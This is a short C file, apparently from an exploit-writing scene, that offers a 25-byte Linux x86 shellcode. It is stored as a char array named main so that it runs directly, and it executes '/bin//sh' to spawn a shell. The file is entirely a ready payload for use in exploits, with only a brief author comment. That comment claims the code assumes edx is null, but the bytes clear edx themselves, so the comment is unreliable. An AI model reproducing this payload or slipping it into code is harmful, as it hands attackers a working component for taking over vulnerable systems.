/* 25 bytes execve, assumes edx is null! Not the case
   in any exploit i have come across, check 23-ash.c
   for mul :)
   -bob
*/

/* 25 byte shellcode! */

char main[]= 
"\x31\xc0\x31\xd2\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x50\x53\x89\xe1"
"\xb0\x0b\xcd\x80";
		
